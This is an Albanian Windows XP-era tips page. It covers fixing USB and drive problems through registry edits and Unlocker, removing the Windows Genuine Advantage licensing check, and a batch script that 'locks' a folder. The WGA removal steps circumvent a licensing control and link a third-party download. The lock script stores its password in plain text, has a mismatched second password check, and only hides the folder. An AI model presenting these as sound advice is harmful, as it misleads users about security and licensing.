Kliko Start -> Run, shkruaj REGEDIT -> OK
Gjej lokacionin:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E980-E325-11CE-BFC1-08002BE10318}
Selekto UpperFilters , shtyp Delete, pastaj Yes.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}
Selekto LowerFilters , shtyp Delete, pastaj Yes.
Mbyll dritaren punuese
Restarto kompjuterin dhe shiko efektin

2. Problem në ndaljen e USB


Kur deshironi te ndaloni punen e USB me ane te opcionit “Safely Remove Hardware”, ju shfaq errorin “Generic volume can not be stopped right now”. Ndalja ne menyre jo të rregullt mund ta demtojë USBtuaj. 

Per te zgjidhur nje problematikë te tille ndiq udhezimet e meposhtme: 

Shkarko Unlocker dhe instalo ne kompjuter.
Kliko me tastin e djathte mbi USB dhe selekto Unlocker.
Nje dritare tjeter do hapet, aty kliko butonin Unlock All si ne foton e meposhtme.


Pasi te klikojsh Unlock All provo te ndalesh USB ne menyre normale, nepermjet opcionit “Safely Remove Hardware”.
Nese prape nuk je ne gjendje te ndalesh ne menyre te rregullt, kliko butonin Kill Process në Unlocker.
Shënim: Nese njera nga opcionet nuk funksionon atehere mundesia e fundit eshte te fikësh kompjuterin dhe ta nxjerresh USB nga porta e saj. 


3. Kompjuteri detekton USB , por nuk e shfaq ikonen në My Computer 
Ky problem shfaqet kur kompjuteri njef USB si pajisje te jashtme mirepo nuk esht ene gjendje qe ne menyre virtuale ta shfaq ate . 

Per te zgjidhur nje problematikë te tille ndiq udhezimet e meposhtme:
Vendos USB ne kompjuter

Kliko Mbi My computer me tast djatht > Manage
Zgjedh Storage
Zgjidh Disk Management
Zgjedh Usb-ën tuaj
Kliko me tast djatht ”Change drive letter and paths“
Pastaj e ke Assign the following the drive leter
Ndrysho emrin e Usb psh prej F në S ose X 

Si Ta Heqim Window Genuine

shko ! my computer - disk c - windows - system 32 gjej wgatray.exe fshije filen ! ose wga .exe ose wgatray.exe //
me pas shtyp ctrl + alt + delete hapet task manager me pas zgjedh processes , dhe nderprej te gjitha wga processes ! /
pastaj START - run - regedit - ok - zgjedhe HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WIN LOGON\ NOTIFY - kliko + te winlogon key dhe fshije at notifikimin key qe eshte

Ose
Shkako Programin Me Posht
http://www.bashbosh.com/remove-wga-windows-xp-download/

Si Te Bejme 1 Folder Me Password

1.Krijo nje folder te ri ne desktop..
2.hape folderin dhe krijo nje text file te ri,,pra hap notepad,,
3.jepi paste ketij kodi qe ke me posht..

cls
@ECHO OFF
title Folder Personal
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Personal goto MDLOCKER
:CONFIRM
echo Are you sure u want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Personal "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set /p "pass=>"
if NOT %pass%==passwordhere goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Personal
echo Folder unlocked successfully
goto End
:FAIL
echo Invalid password
goto UNLOCK2
:FAIL2
echo Invalid password
goto end
:MDLOCKER
md Personal
echo Folder created successfully
goto End
:UNLOCK2
echo Last chance to enter correct password to unlock folder
set /p "pass=>"
if not %pass%==password goto FAIL2
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Personal
echo Folder unlocked successfully
:End

4.Ne rreshtin e 23. ,,aty ku thot password here vini passwordin tuaj qe do perdorni per me hap folderin,,
5.tashi ruje ate qe bere ne notepad me emer.."locker.bat" (pa thonjza dhe sigurohuni qe ta vini .bat ,,perndryshe nuk do funksionoje,,)
6.shikojm qe krijohet nje file .exe te cilen e klikojme dy here ,,dhe shikojm qe do na shfaqet nje folder me emrin "personal"..
7.aty ne folderin "personal" vendosni te gjitha gjerat tuaja qe doni ti beni me password..
8.Me pas klikojeni serish filen "locker.bat",,hapet CMD dhe do shikoni nje pyetje per sigurimin e folderit,,shkruani vetem nje "y" (dmth yes) dhe jepini enter,,
9.do shikoni qe folderi "personal" do zhduket..
10.kur te doni ta hapni serish folderin me gjerat tuaja te fshehta brenda,,klikoni dy here "locker.bat" dhe vendosni passwordin dhe shtypni enter,,,
11.Pastaj me vone pasi te mbaroni pune me folderin tuaj personal,,mos harroni ta siguroni qe te zhduket,te mbyllet,,duke bere procesin qe thash me lart,,